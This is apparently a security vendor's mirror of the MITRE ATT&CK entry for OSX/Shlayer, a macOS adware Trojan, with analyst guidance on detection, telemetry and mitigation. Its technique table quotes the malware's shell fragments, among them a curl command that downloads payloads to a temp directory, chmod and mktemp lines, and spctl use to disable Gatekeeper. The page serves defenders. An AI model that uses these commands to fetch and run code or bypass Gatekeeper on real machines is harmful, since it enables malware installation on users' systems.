Live Active security incident? Get immediate response
MITRE ATT&CK® Malware

S0402: OSX/Shlayer

OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.[1][2]

EnterpriseS0402MalwareObject v1.4 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

OSX/Shlayer matters because it represents a macOS Trojan pattern that can turn user-driven execution into adware installation while using macOS-specific evasion and persistence behaviors. For leaders, the practical issue is not only “malware on Macs,” but whether the organization can see and control script execution, downloaded files, browser extension changes, privilege prompts, Gatekeeper-related events, hidden artifacts, and unexpected file transfers on macOS endpoints.

Executive priority

Treat this as a macOS endpoint resilience and evidence-readiness issue. If Macs are used by executives, developers, finance, or privileged administrators, gaps in macOS logging, endpoint management, browser extension governance, and user privilege controls can leave SOC and IR teams with weak evidence during an incident. Priority should go to validating macOS EDR/MDM coverage, browser extension inventory, least-privilege enforcement, and response playbooks for suspicious downloads, shell execution, and privilege prompts.

Technical view

ATT&CK provides no official detection text for OSX/Shlayer, so defenders should build validation around the related techniques: user-opened malicious files, Unix shell execution, system and file discovery, ingress tool transfer, deobfuscation, browser extension persistence, permission changes, elevated execution prompts, Gatekeeper bypass behavior, and macOS artifact hiding including hidden files, resource forks, and ignored process interrupts. SOC teams should confirm they can correlate a downloaded or user-launched file with child shell processes, network retrieval of additional files, changes to browser extensions or configuration profiles where visible, permission or extended-attribute changes, and suspicious placement or naming that resembles legitimate resources.

Likely telemetry

  • macOS endpoint process creation and command-line telemetry, especially sh/bash/zsh activity spawned by downloaded or user-launched files
  • File creation, modification, rename, permission, hidden attribute, and extended attribute telemetry on macOS
  • Browser extension inventory and change events across managed browsers
  • MDM or endpoint management evidence for Gatekeeper, quarantine, notarization-related policy state, and configuration changes where available
  • Network telemetry for external file downloads or tool transfer from macOS hosts

Detection direction

  • Validate macOS-specific visibility rather than assuming Windows-centric endpoint rules apply.
  • Correlate user execution of downloaded files with shell child processes, discovery commands, external downloads, permission changes, and hidden artifact creation.
  • Tune for suspicious browser extension installation or modification, while accounting for legitimate enterprise-managed extensions.
  • Review events involving Gatekeeper bypass indicators, quarantine or extended attribute changes, and resource fork usage, recognizing that some administrative or developer workflows may create false positives.
  • Look for files placed in trusted-looking locations or named to resemble legitimate resources, especially when paired with recent download, shell execution, or network retrieval activity.

Mitigation priorities

  • Ensure macOS endpoints are enrolled in managed endpoint security and MDM with auditable policy enforcement.
  • Limit routine administrator privileges and review workflows that train users to approve unexpected elevated execution prompts.
  • Enforce controlled software download and execution policies, including Gatekeeper and quarantine-related protections where appropriate.
  • Govern browser extensions through inventory, allowlisting or approval processes, and periodic review.
  • Collect and retain macOS process, file, network, browser, and management telemetry needed for incident reconstruction.
Analyst notes and limits

The relationship set makes this object useful for coverage assessment across macOS execution, persistence, privilege escalation, defense impairment, discovery, command-and-control, and stealth behaviors. The strongest defensive value is to use OSX/Shlayer as a macOS control-validation scenario: can the team prove what ran, what it downloaded, what it changed, whether it requested elevation, and whether it persisted through browser-related mechanisms?

MITRE does not provide official detection guidance, tactics are not specified on the malware object, and the supplied description is brief. This take is therefore based on the official description, external references, platform field, and ATT&CK relationships only. Local telemetry, endpoint configuration, browser fleet data, and user privilege models are required to determine actual exposure or coverage.

Official MITRE ATT&CK definition

OSX/Shlayer

OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.[1][2]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

15 rows
Domain ID Name Relationship / procedure
Enterprise T1564 Hide Artifacts

OSX/Shlayer has used the mktemp utility to make random and unique filenames for payloads, such as export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)" or mktemp -t Installer.Citationsentinelone shlayer to zshlayerCitation20 macOS Common Tools and TechniquesCitationShlayer jamf gatekeeper bypass 2021
Enterprise T1564.001 Hidden Files and Directories Sub-technique

OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG.CitationCarbon Black Shlayer Feb 2019
Enterprise T1222.002 Linux and Mac Permissions Sub-technique

OSX/Shlayer can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.Citation20 macOS Common Tools and TechniquesCitationCarbon Black Shlayer Feb 2019CitationShlayer jamf gatekeeper bypass 2021
Enterprise T1204.002 Malicious File Sub-technique

OSX/Shlayer has relied on users mounting and executing a malicious DMG file.CitationCarbon Black Shlayer Feb 2019CitationIntego Shlayer Feb 2018
Enterprise T1176.001 Browser Extensions Sub-technique

OSX/Shlayer can install malicious Safari browser extensions to serve ads.CitationIntego Shlayer Apr 2018CitationMalwarebytes Crossrider Apr 2018
Enterprise T1553.001 Gatekeeper Bypass Sub-technique

If running with elevated privileges, OSX/Shlayer has used the spctl command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.CitationCarbon Black Shlayer Feb 2019CitationShlayer jamf gatekeeper bypass 2021Citationobjectivesee osx.shlayer apple approved 2020
Enterprise T1059.004 Unix Shell Sub-technique

OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command sh -c tail -c +1381... to extract bytes at an offset from a specified file. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.CitationCarbon Black Shlayer Feb 2019Citationsentinelone shlayer to zshlayerCitation20 macOS Common Tools and TechniquesCitationobjectivesee osx.shlayer apple approved 2020
Enterprise T1564.011 Ignore Process Interrupts Sub-technique

OSX/Shlayer has used the `nohup` command to instruct executed payloads to ignore hangup signals.CitationShlayer jamf gatekeeper bypass 2021
Enterprise T1140 Deobfuscate/Decode Files or Information

OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads.CitationCarbon Black Shlayer Feb 2019 Versions of OSX/Shlayer pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.Citationsentinelone shlayer to zshlayerCitation20 macOS Common Tools and Techniques
Enterprise T1036.005 Match Legitimate Resource Name or Location Sub-technique

OSX/Shlayer can masquerade as a Flash Player update.CitationCarbon Black Shlayer Feb 2019CitationIntego Shlayer Feb 2018
Enterprise T1564.009 Resource Forking Sub-technique

OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.Citationtau bundlore erika noerenberg 2020Citationsentinellabs resource named fork 2020
Enterprise T1083 File and Directory Discovery

OSX/Shlayer has used the command appDir="$(dirname $(dirname "$currentDir"))" and $(dirname "$(pwd -P)") to construct installation paths.Citationsentinelone shlayer to zshlayerCitation20 macOS Common Tools and Techniques
Enterprise T1082 System Information Discovery

OSX/Shlayer has collected the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.CitationCarbon Black Shlayer Feb 2019Citationsentinelone shlayer to zshlayer
Enterprise T1105 Ingress Tool Transfer

OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.CitationCarbon Black Shlayer Feb 2019Citationsentinelone shlayer to zshlayerCitation20 macOS Common Tools and TechniquesCitationobjectivesee osx.shlayer apple approved 2020
Enterprise T1548.004 Elevated Execution with Prompt Sub-technique

OSX/Shlayer can escalate privileges to root by asking the user for credentials.CitationCarbon Black Shlayer Feb 2019
Relationship explorer

All related ATT&CK context

uses · Technique T1564: Hide Artifacts Enterprise uses · Technique T1564.001: Hidden Files and Directories Enterprise uses · Technique T1222.002: Linux and Mac Permissions Enterprise uses · Technique T1204.002: Malicious File Enterprise uses · Technique T1176.001: Browser Extensions Enterprise uses · Technique T1553.001: Gatekeeper Bypass Enterprise uses · Technique T1059.004: Unix Shell Enterprise uses · Technique T1564.011: Ignore Process Interrupts Enterprise uses · Technique T1140: Deobfuscate/Decode Files or Information Enterprise uses · Technique T1036.005: Match Legitimate Resource Name or Location Enterprise uses · Technique T1564.009: Resource Forking Enterprise uses · Technique T1083: File and Directory Discovery Enterprise uses · Technique T1082: System Information Discovery Enterprise uses · Technique T1105: Ingress Tool Transfer Enterprise uses · Technique T1548.004: Elevated Execution with Prompt Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.4
Created
Modified
Raw hash
0086df520da8553c...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.4 Current bundle 0086df520da8…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Carbon Black Shlayer Feb 2019

    Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.

    Open source URL
  2. [2]
    Intego Shlayer Feb 2018

    Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.

    Open source URL
  3. [3]
    Crossrider

    (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)

  4. [4]
    Intego Shlayer Apr 2018

    Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.

    Open source URL
  5. [5]
    Malwarebytes Crossrider Apr 2018

    Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.

    Open source URL
  6. [6]
    OSX/Shlayer

    (Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)

  7. [7]
    Zshlayer

    (Citation: sentinelone shlayer to zshlayer)

  8. [8]
    mitre-attack S0402
    Open source URL
  9. [9]
    sentinelone shlayer to zshlayer

    Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.

    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use